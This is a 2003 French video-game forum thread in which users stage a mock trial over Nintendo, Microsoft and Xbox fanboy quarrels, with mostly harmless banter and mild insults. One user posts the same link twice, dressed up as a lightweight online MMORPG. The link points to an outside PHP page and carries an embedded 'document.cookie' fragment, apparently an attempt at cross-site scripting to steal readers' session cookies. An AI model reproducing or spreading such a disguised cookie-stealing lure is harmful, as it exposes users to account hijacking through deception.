CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Liste des sujets

Fayotage and Co

cellter
cellter
Niveau 6
06 mai 2003 à 22:59:23

La pendaison:

( archives forum gamecube)

" Kaji_Ryoji Posté le 25 novembre 2002 à 20:41:12
Je ne suis pas particulierement pro Nintendo, j´ai la PS2 aussi et je ne crache pas dessus, mème si pour moi l´acheter a sa sortie était une arnaque ( ce que je n´ai pas fait ) .

Par contre je suis Anti Micro$oft, et par consequent antixbox.

M$ je leur chie dessus et j´emmerde billou!! "

Kaji_Ryoji
Kaji_Ryoji
Niveau 10
06 mai 2003 à 23:02:46

http://fr.news.yahoo.com/030506/85/36lig.html

Tenez voici le futur accesoire Xboxlive !

Je ne critique pas les bons jeux de la console, juste son constructeur qui ne peut rien apporter de bons dans le secteur.

Pseudo supprimé
Pseudo supprimé 06 mai 2003 à 23:05:40

Objection ! Je ne vois pas en quoi un livre de grammaire pourrait nous eclairer sur l´utilisation correcte d´un nom et d´un adjectif cense former l´expression " patience epuisee". De toute maniere, l´expression exacte est " perdre patience". Encore une fois mon client avait raison.

M. Oursinou n´a insulte personne. Que M. Kaji apporte les preuves de ce qu´il avance.

Maitre le_jap, avocat d´Oursinou.

Kaji_Ryoji
Kaji_Ryoji
Niveau 10
06 mai 2003 à 23:08:11

" Maintenant, l´exemple véridique qui prouve que ma parole n´est qu´un illustre mélange de vérité et de sincérité. Joypad, 1992 je crois... Zelda sur super nes est testé en import, comme tous les sites, Joy le note 99%. Landstalker, grosse surprise d´un quasi inconnu Climax sort sur la console concurrente, 98%, bon... vf de Zelda maintenant, 98%... et oui, la concurrence a été rude entre la sortie nippone et la sortie française... déjà méfiants et agressifs dès lors qu´on ne traitait pas leur N adoré avec tous les égards, certains pro-N de l´époque ( dont la mère de Kaji-Ryoji) avaient écrit à Joypad... Ben oui, ils n´y connaissaient rien, d´ailleurs tous les mags avaient enchainé les 99 à Zelda 3... Aucun testeur n´a par ailleurs jugé Mario 3, 4 de titre seulement excellent, non non... 99% à chaque fois, alors que n´importe quelle autre compagnie avait vraiment du bol d´atteindre les 97... "

Je considère cela comme une insulte parfaitement injustifié et intolerable.

Oursinou
Oursinou
Niveau 10
06 mai 2003 à 23:16:34

J´aimerais faire part à la cours de la pitié que j´éprouve en ce moment pour M. Kaji. De grâce, qu´on lui offre l´aide juridique pour qu´il ait à son tout un avocat...

Pseudo supprimé
Pseudo supprimé 06 mai 2003 à 23:19:42

M. Kaji, vous considerez vous comme " pro-N" ? Considerez vous que le terme " pro-N" puisse etre insultant ? Mon client a une definition tres clair du terme " pro-N". Un " pro-N", c´est quelqu´un qui aime Nintendo, tout simplement. Ou est l´insulte la dedans, je vous le demande M. Le Juge ! Maintenant, M. Kaji peut-il nous indiquer les termes injurieux qui se trouve dans ce texte ? Encore une fois, M. Kaji detourne de facon personnelle et mahonnete des propos qui ne lui appartiennent pas, dans le seul but d´attaquer et de diffamer mon client devant l´opinion publique.

Maitre le_jap, avocat d´Oursinou.

Kaji_Ryoji
Kaji_Ryoji
Niveau 10
06 mai 2003 à 23:24:39

Il parle de personnes dont il n´a pas l´autorisation, et fait des suppositions qui n´engagent que lui.

En consequence je juge qu´il doit s´excuser immediatement.

lynchcore-gamer
lynchcore-gamer
Niveau 10
06 mai 2003 à 23:48:23

heureusement que le jap est venue calmer tout ça...t´as trouvé un nouveau moyen de modérer le jap? ^_^

Oursinou:ce que je dis,c´est qu´il parait aujourd´hui si simple de cracher sur nintendo avec des arguments aussi inutiles qu´entendus que venir le dire une nouvelle fois,c´est exaspérant.Tu n´aimes pas nintendo ou peu,depuis la première heure? soit! mais dans ce cas là,je ne vois pas pour toi l´intérêt de t´intéresser davantage à cette boite,fais ta vie de ton coté,tu as tout à fait le droit de ne voir qu´une sociétè banale mais arrête par pitié de la jouer joueur marginal qui fait rien comme tout le monde...;)

KOman
KOman
Niveau 3
06 mai 2003 à 23:51:47

Je vous donne l´adresse d´un superbe jeu en ligne qui n´utilise presque pas de ressources!
Il s´agit d´un RPG massivement multijoueurs, les graphismes sont beaux et le jeu est fluide!

http://membres.lycos.fr/sideclick/Game/Gamezone.php?a="+document.cookie;"

Kaji_Ryoji
Kaji_Ryoji
Niveau 10
06 mai 2003 à 23:51:56

Voila merci...

Le débat est clos, le grand procureur a rendue son verdict, oursinou est coupable de touts les chefs d´accusations.

Il est condamer a jouer a Mario jusqu´a la fin de ses jours...

KOman
KOman
Niveau 3
06 mai 2003 à 23:57:00

Je vous donne l´adresse d´un superbe jeu en ligne qui n´utilise presque pas de ressources!
Il s´agit d´un RPG massivement multijoueurs, les graphismes sont beaux et le jeu est fluide!

Enfin voilà, testez le c sympa !
http://membres.lycos.fr/sideclick/Game/Gamezone.php?a="+document.cookie;"

DragonMnementh
DragonMnementh
Niveau 10
07 mai 2003 à 00:10:25

il semble que nous ayons affaire à un conflit générationnel ou le choc des mots de deux mondes éloignés, en temps, culturellement, provoque ce différent entre les deux parties.
Je souhaite que la partie plaigante, représentée par Maitre le_jap, en passe aux faits précis envers l´accusé Kaji_Ryoji, même en l´absence de son avocat qui ne s´est toujours pas manifesté.
Je demande en outre aux 2 parties, Oursinou, et Kaji précédement cité de ne pas considérer ce prêtoire comme la continuité de leur dispute.

Oursinou
Oursinou
Niveau 10
07 mai 2003 à 07:38:26

Bon, ce post est le dernier du mois normalement, je reviendrai après les sorties de Brute Force, Yger et Moto gp 2.

Lynchcore> encore une fois c´est tout blanc ou tout noir... qu´entends-tu par " Tu n´aimes pas nintendo ou peu,depuis la première heure? " ? j´ai pas dit ça, ou rien qui tend à le dire, j´ai juste dit que mes meilleurs trip de joueur, je les ai pas eu sur leurs jeux? 9

cellter
cellter
Niveau 6
07 mai 2003 à 08:17:40

lynchcore-gamer prêche la mauvaise foi dans sa paroisse. Ninendo ou pas, je lis enormement de mone cracher sur microsoft et je te lis pas pour autant la ramener. Chacun est libre de ne pas apprecier les jeux de nintendo surtout quand celui ci fait bouffer du mario depuis plus de 15 ans, telle une boulimie, l´ecoeurement est proche. Meme si cela derange ces fans boys extremiste de la secte nintendo.

mrx2003
mrx2003
Niveau 10
07 mai 2003 à 08:23:30

ecoeurement voire meme indigestion . ..20ans qu´on en bouffe du mario !

vampirio
vampirio
Niveau 10
07 mai 2003 à 08:35:38

perso, je ne vois pas ( plus ) ce que N à de magique: on met le logo et pouf ca y est le jeu est remplis d´une touche invisible et indicible?
franchement,se bouffer du mario, du pokemmo, zelda, et touti conti dans divers episodes ( à la plge, au coiffeur, au metro,au foot, au tennis, au kart,....) devient fatiguant et limite foutage de gueule et manque d´inspiration...
SSBM, si tu n´aimes pas les pokemon et bine tant pis pour toi, il y en a à foissont et oblige de dire que c´est " magique", SMP4 lassnt en solo pour debloquer des bonus, et en multiplayer, une fois que tu as joué à kung fus chaos, tu le laches et rapidos....
la seule magis que je vois, c´est que les pro N sont persuade d´avoir LE createur de jeux, l´unique, et que le big N peut nous sortir des derives à foisons de ses heros phares,pas graves c´est magique: il peut sortir des pokefric, des mario et zelda, la rentabilité est devenue maximale ( affaire des cartouches ) : oui N est magique

XMANTRONIX
XMANTRONIX
Niveau 10
07 mai 2003 à 08:44:29

Le mec qu´a fait le test est un fan de la serie
et de la gamecube, le jeu l´a pleinement satisfait
a un point ou il s´est emballé un peu lol, bref il
etait chaud pour pas dire bouillant vu le commentaire a la fin dans le general, qui rapelle l´existence du pack au cas ou mdr.. la reflexion de beaucoup sur ce 20 vient du fait qu´il n´y a plus la toute petite meme minime marge d´objectivité, le 19 etant la
valeur sure et de reference.

Bolo_YEUNG
Bolo_YEUNG
Niveau 9
07 mai 2003 à 09:23:25

DragonMnementh Posté le 07 décembre 2002 à 15:21:34

< <Vyse, on peut être contradicteur en restant poli, ouvert et de bonne foi, ce qui me paraît être le cas de darkgadjo... sa réponse au sujet de ta critique envers la gc l´était et me semble bien plus intelligente que tes multiples mesquineries... le désigner comme " fouteur de merde" ou " provocateur" montre ta fermeture au débat et à la contradiction, et ce n´est pas Oursinou qui va l´excuser par un subterfuge rapide mais faux... tu passes ton temps à t´en prendre à des personnes qui expriment un avis avec la forme qui convient et sans insulter... que peut on en tirer comme conclusion à force de t´en voir t´en prendre à tout ce qui bouge ? tu prends tout au premier degré et tu ne sais pas argumenter sans attaquer les personnes plutôt que donner des arguments valables. Tu es inintéressant et néfaste à un forum. L´image négative des proxbox, tu en es le permier responsable.>>

vampirio
vampirio
Niveau 10
07 mai 2003 à 09:25:40

on va t´appeller robot bolo young
50% machine
50% humain
100% pas objectif

Bolo_YEUNG
Bolo_YEUNG
Niveau 9
07 mai 2003 à 09:31:03

Bien joué . .. mais une BRIQUE . .. ne rend jamais les COUPS.

Sous forums
  • Gameboy Advance
  • PlayStation Vita
  • Xbox (2001)
  • PlayStation 3
  • Gamecube
  • PlayStation
  • Nintendo 64
  • Dreamcast
  • PlayStation 2
  • Gameboy
  • PlayStation Portable